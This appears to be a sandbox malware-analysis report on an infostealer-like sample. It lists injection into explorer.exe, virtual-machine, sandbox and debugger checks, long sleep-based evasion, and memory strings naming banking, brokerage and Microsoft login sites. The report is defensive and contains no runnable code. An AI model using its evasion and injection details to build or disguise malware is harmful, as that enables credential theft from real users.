Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03223862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, 9_2_03223862
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\hfetwhc | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\SysWOW64\explorer.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_11-884
Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | API/Special instruction interceptor: Address: 7FFBCB7AE814
Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | API/Special instruction interceptor: Address: 7FFBCB7AD584
Source: C:\Users\user\AppData\Roaming\hfetwhc | API/Special instruction interceptor: Address: 7FFBCB7AE814
Source: C:\Users\user\AppData\Roaming\hfetwhc | API/Special instruction interceptor: Address: 7FFBCB7AD584
Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe, hfetwhc.2.dr | Binary or memory string: SBIEDLLASWHOOKSNXHK^
Source: hfetwhc, hfetwhc, 00000010.00000002.3927540281.0000000000401000.00000040.00000001.01000000.00000005.sdmp, hfetwhc, 00000010.00000000.3773952880.0000000000401000.00000080.00000001.01000000.00000005.sdmp, 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe, hfetwhc.2.dr | Binary or memory string: ASWHOOK
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03223862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, 9_2_03223862
Source: C:\Windows\SysWOW64\explorer.exe | Thread delayed: delay time: 600000
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 484
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 2501
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 802
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 351
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1805
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 876
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 873
Source: C:\Windows\SysWOW64\explorer.exe | Window / User API: threadDelayed 4144
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 3727
Source: C:\Windows\SysWOW64\explorer.exe | Window / User API: threadDelayed 4037
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 3635
Source: C:\Windows\SysWOW64\explorer.exe | Window / User API: threadDelayed 2602
Source: C:\Windows\SysWOW64\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_0e357aa451e0d2d7\WalletService.dll.mui
Source: C:\Windows\SysWOW64\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d\WalletProxy.dll
Source: C:\Windows\SysWOW64\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dll
Source: C:\Windows\SysWOW64\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dll
Source: C:\Windows\SysWOW64\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletProxy.dll
Source: C:\Windows\SysWOW64\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\Windows.ApplicationModel.Wallet.dll
Source: C:\Windows\SysWOW64\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\Windows.ApplicationModel.Wallet.dll
Source: C:\Windows\SysWOW64\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_5f44912b33b38332\WalletProxy.dll
Source: C:\Windows\SysWOW64\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_046b779f2003c415\WalletBackgroundServiceProxy.dll
Source: C:\Windows\SysWOW64\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\WalletService.dll
Source: C:\Windows\SysWOW64\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\WalletBackgroundServiceProxy.dll
Source: C:\Windows\SysWOW64\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\WalletProxy.dll
Source: C:\Windows\SysWOW64\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_fa16cd4ceba3021a\WalletBackgroundServiceProxy.dll
Source: C:\Windows\SysWOW64\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed\Windows.ApplicationModel.Wallet.dll
Source: C:\Windows\SysWOW64\explorer.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_13-8871
Source: C:\Windows\explorer.exe TID: 4124 | Thread sleep count: 484 > 30
Source: C:\Windows\explorer.exe TID: 2288 | Thread sleep count: 2501 > 30
Source: C:\Windows\explorer.exe TID: 2288 | Thread sleep time: -250100s >= -30000s
Source: C:\Windows\explorer.exe TID: 2464 | Thread sleep count: 802 > 30
Source: C:\Windows\explorer.exe TID: 2464 | Thread sleep time: -80200s >= -30000s
Source: C:\Windows\explorer.exe TID: 4132 | Thread sleep count: 313 > 30
Source: C:\Windows\explorer.exe TID: 3428 | Thread sleep count: 335 > 30
Source: C:\Windows\explorer.exe TID: 3428 | Thread sleep time: -33500s >= -30000s
Source: C:\Windows\explorer.exe TID: 964 | Thread sleep count: 351 > 30
Source: C:\Windows\explorer.exe TID: 964 | Thread sleep time: -35100s >= -30000s
Source: C:\Windows\explorer.exe TID: 2288 | Thread sleep count: 1805 > 30
Source: C:\Windows\explorer.exe TID: 2288 | Thread sleep time: -180500s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6556 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5436 | Thread sleep count: 4144 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5436 | Thread sleep time: -4144000s >= -30000s
Source: C:\Windows\explorer.exe TID: 6016 | Thread sleep count: 3727 > 30
Source: C:\Windows\explorer.exe TID: 6016 | Thread sleep time: -3727000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5212 | Thread sleep count: 4037 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5212 | Thread sleep time: -4037000s >= -30000s
Source: C:\Windows\explorer.exe TID: 6288 | Thread sleep count: 3635 > 30
Source: C:\Windows\explorer.exe TID: 6288 | Thread sleep time: -3635000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5728 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5676 | Thread sleep count: 2602 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5676 | Thread sleep time: -1561200000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5676 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose, 7_2_007E2B15
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose, 7_2_007E1D4A
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose, 7_2_007E3ED9
Source: C:\Windows\explorer.exe | Code function: 8_2_00A330A8 FindFirstFileW,FindNextFileW,FindClose, 8_2_00A330A8
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_032215BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose, 9_2_032215BE
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_032213FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose, 9_2_032213FE
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_032214D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose, 9_2_032214D8
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030C2240 FindFirstFileW,FindNextFileW,FindClose, 13_2_030C2240
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030C18E0 lstrcatW,lstrcatW,PathCombineW,lstrcatW,PathRemoveFileSpecW,FindFirstFileExW,lstrcmpiW,PathCombineW,PathCombineW,FindNextFileW,FindClose, 13_2_030C18E0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030C20C1 FindFirstFileW,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose, 13_2_030C20C1
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030C1A96 GetTempPathW,GetTempFileNameW,DeleteFileW,PathRemoveExtensionW,StrRChrW,CreateDirectoryW,GetLogicalDriveStringsW,GetDriveTypeW,lstrcatW,CreateThread,lstrlenW,WaitForMultipleObjects,CloseHandle,StrStrIW,SHGetFolderPathW,PathFindFileNameW,PathAppendW,ExpandEnvironmentStringsW, 13_2_030C1A96
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E6512 GetSystemInfo, 7_2_007E6512
Source: C:\Windows\SysWOW64\explorer.exe | Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: wu8T4pTb6lB/S4575QEMucJCA6t2SIK8JRkixF4YO6ZIn2ECrfxnkHDBpze1yCdc
Source: CB6F.tmp.7.dr | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: explorer.exe, 0000000D.00000003.3028944586.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.3331097674.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2720681255.00000000052D7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWx
Source: explorer.exe, 00000002.00000000.1475801434.0000000009330000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: CB6F.tmp.7.dr | Binary or memory string: AMC password management pageVMware20,11696494690
Source: CB6F.tmp.7.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: CB6F.tmp.7.dr | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: CB6F.tmp.7.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: /58dkNNZeUbpzKEqNMgIfedN5t07OwVaUYdUvHAi1Vmci+AyDoG5YM9Sp6Avz8GZ
Source: CB6F.tmp.7.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: CB6F.tmp.7.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: explorer.exe, 00000002.00000000.1475801434.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.000000000330C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.00000000032E2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.3328845519.00000000052C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2720681255.00000000052C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3929873885.00000000052C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.3337698366.00000000052C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: nN4Ob0EdihPikyg9/f2Ijp9YtJyWtm9Pt4bjD4m2I+TQnlE0jQEmu/HiZX58CXfr
Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: F7Y4Jb8TGC2Y9elc4Q+PXVFeaNGLOMyeQu+4D4TZJIj9HVFJJRHoqeMUzmixNUIE
Source: explorer.exe, 00000002.00000000.1475801434.0000000009255000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000002.00000000.1475801434.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: CB6F.tmp.7.dr | Binary or memory string: tasks.office.comVMware20,11696494690o
Source: CB6F.tmp.7.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: X0965qmFJYZTMZgkPxQrSMr0mnDTzq3h/B4LcIPnwQnvFDEojVMCisheyqbiKRaU
Source: explorer.exe, 00000002.00000000.1475801434.0000000009255000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTcaVMWare
Source: CB6F.tmp.7.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: CB6F.tmp.7.dr | Binary or memory string: global block list test formVMware20,11696494690
Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: qnJ9IBIqERRPYObzqzCR4E2Pno4vEQK5S3ZmJvdJxxHaOiUt87o3qzu/N3hgfsJy
Source: CB6F.tmp.7.dr | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: CB6F.tmp.7.dr | Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: CB6F.tmp.7.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: CB6F.tmp.7.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MV5B3gKLZfBeiIIkOrqzjInc/BDc3VmciZVyyZuAhLdyfok7kfwJgNXGoXAflaSi
Source: CB6F.tmp.7.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: CB6F.tmp.7.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: CB6F.tmp.7.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: explorer.exe, 00000002.00000000.1475801434.0000000009330000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.1472698024.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: CB6F.tmp.7.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: CB6F.tmp.7.dr | Binary or memory string: discord.comVMware20,11696494690f
Source: CB6F.tmp.7.dr | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: CB6F.tmp.7.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: CB6F.tmp.7.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CtMruuE88zUegpohoAYRJ5dRE/S0A+7zN9dr9JB5J+VR6hgFS0rtauc+i0GQp33G
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Tp1R+vlrD1IQbQGaqeMUcxBijXs2eD8iAol/tEQCxHEjuBNMhnlsJ+8L3PKFV9ij
                      Source: explorer.exe, 00000002.00000000.1472698024.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRpxBXUnPrQ1RF72qpFNThLnlIDIyFvDGaGgj/xA5nx96U1DmUZuNQemu+yD60k5
                      Source: CB6F.tmp.7.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                      Source: CB6F.tmp.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                      Source: CB6F.tmp.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                      Source: explorer.exe, 00000002.00000000.1475801434.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: CB6F.tmp.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                      Source: CB6F.tmp.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                      Source: CB6F.tmp.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UFrfpwV8tVMcIS3xoTFuj5TBeDaN1/q2SnijhlCzHbMQcma6JLlAb89jwcbHadsp
                      Source: CB6F.tmp.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                      Source: explorer.exe, 00000002.00000000.1472698024.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: paL2NRvMCI0MgIwk3w9na8CLQs89jm8ml68lWff74o5sWe0hB35mVASi9cjw6Zgw
                      Source: CB6F.tmp.7.drBinary or memory string: dev.azure.comVMware20,11696494690j
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zky1YUFElgKHOKZFDPrTGaZ3KIn1xbublyxGLQWkIU8BbnmvMCihnACmZs/Ixgls
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +OqVKFUapLs7dkeBTUj/LDdQgceC7O/XE2zjxph4fHgFSuPx5NkzZn5ezpms5G2K
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CaCmYyEidjs0HgLkCOUXz5yRIveOPVo422YPEhU7nqvMCiRtQKO+fno8bUejgrcf
                      Source: explorer.exe, 00000002.00000000.1472698024.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: explorer.exe, 0000000D.00000003.2719046288.00000000059A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gx68nznXX4ETXERyNzBanQ0q7UQgKLfP7RE0ac2eJR3AHGFsyJ8lQsVMECkiBNTX
                      Source: C:\Windows\SysWOW64\explorer.exeAPI call chain: ExitProcess graph end nodegraph_13-8872
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\hfetwhc | System information queried: CodeIntegrityInformation
Source: C:\Windows\SysWOW64\explorer.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep | graph_13-8479
Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\hfetwhc | Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03221E4C CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock, | 9_2_03221E4C
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030CCBFA IsDebuggerPresent, | 13_2_030CCBFA
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030CE15A RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, | 13_2_030CE15A
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03223862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, | 9_2_03223862
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_00849247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, | 7_2_00849247
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_007E1011 GetProcessHeap,RtlFreeHeap, | 7_2_007E1011
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_030C8DF5 SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 13_2_030C8DF5

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | File created: hfetwhc.2.dr
Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Thread created: C:\Windows\explorer.exe EIP: BE19D0
Source: C:\Users\user\AppData\Roaming\hfetwhc | Thread created: unknown EIP: 80E19D0
Source: C:\Windows\explorer.exe | Memory written: PID: 1868 base: A579C0 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 2500 base: 7FF62D872D10 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 3424 base: A579C0 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 2976 base: 7FF62D872D10 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 7064 base: A579C0 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 6984 base: 7FF62D872D10 value: 90
Source: C:\Windows\explorer.exe | Memory written: PID: 5440 base: A579C0 value: 90
